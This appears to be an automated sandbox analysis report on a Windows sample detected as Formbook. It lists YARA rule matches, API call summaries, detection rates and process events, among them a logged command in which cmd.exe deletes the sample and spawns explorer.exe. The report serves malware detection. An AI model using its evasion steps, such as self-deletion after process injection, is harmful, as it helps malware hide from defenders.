          Source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Fp4grWelSC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Fp4grWelSC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Fp4grWelSC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.Fp4grWelSC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Fp4grWelSC.exe.398d3e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Fp4grWelSC.exe.39e3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 0_2_003720500_2_00372050
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 0_2_00D6C8840_2_00D6C884
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 0_2_00D6EC500_2_00D6EC50
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 0_2_00D6EC400_2_00D6EC40
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041D0104_2_0041D010
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B8C34_2_0041B8C3
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041CBAD4_2_0041CBAD
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00408C7B4_2_00408C7B
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00408C804_2_00408C80
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00AB20504_2_00AB2050
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F5D0A11_2_011F5D0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F350611_2_011F3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E655011_2_011E6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E196911_2_011E1969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D719011_2_011D7190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F31DC11_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DD80311_2_011DD803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DE04011_2_011DE040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D9CF011_2_011D9CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D48E611_2_011D48E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DCB4811_2_011DCB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E5FC811_2_011E5FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F6FF011_2_011F6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DFA3011_2_011DFA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D522611_2_011D5226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D5E7011_2_011D5E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D8AD711_2_011D8AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,11_2_011E374E
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_004185E0 NtCreateFile,4_2_004185E0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00418690 NtReadFile,4_2_00418690
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00418710 NtClose,4_2_00418710
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_004187C0 NtAllocateVirtualMemory,4_2_004187C0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041868A NtReadFile,4_2_0041868A
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041870A NtClose,4_2_0041870A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_011F6D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011FB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_011FB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_011DB42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_011D84BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,11_2_011D58A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB4C0 NtQueryInformationToken,11_2_011DB4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB4F8 NtQueryInformationToken,NtQueryInformationToken,11_2_011DB4F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,11_2_011D83F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F9AB4 NtSetInformationFile,11_2_011F9AB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,11_2_011E6550
          Source: Fp4grWelSC.exe, 00000000.00000002.688004733.00000000003DF000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainManag.exe8 vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000000.00000002.693045785.0000000006D10000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000000.685619670.0000000000B1F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainManag.exe8 vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000002.766242265.000000000361D000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000003.762703815.0000000001147000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exe, 00000004.00000002.764785736.000000000179F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fp4grWelSC.exe
          Source: Fp4grWelSC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Fp4grWelSC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Fp4grWelSC.exeVirustotal: Detection: 30%
          Source: Fp4grWelSC.exeReversingLabs: Detection: 39%
          Source: Fp4grWelSC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Fp4grWelSC.exe "C:\Users\user\Desktop\Fp4grWelSC.exe"
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess created: C:\Users\user\Desktop\Fp4grWelSC.exe C:\Users\user\Desktop\Fp4grWelSC.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess created: C:\Users\user\Desktop\Fp4grWelSC.exe C:\Users\user\Desktop\Fp4grWelSC.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fp4grWelSC.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@0/0
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011FA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,11_2_011FA0D2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,11_2_011DC5CA
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_01
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Fp4grWelSC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Fp4grWelSC.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
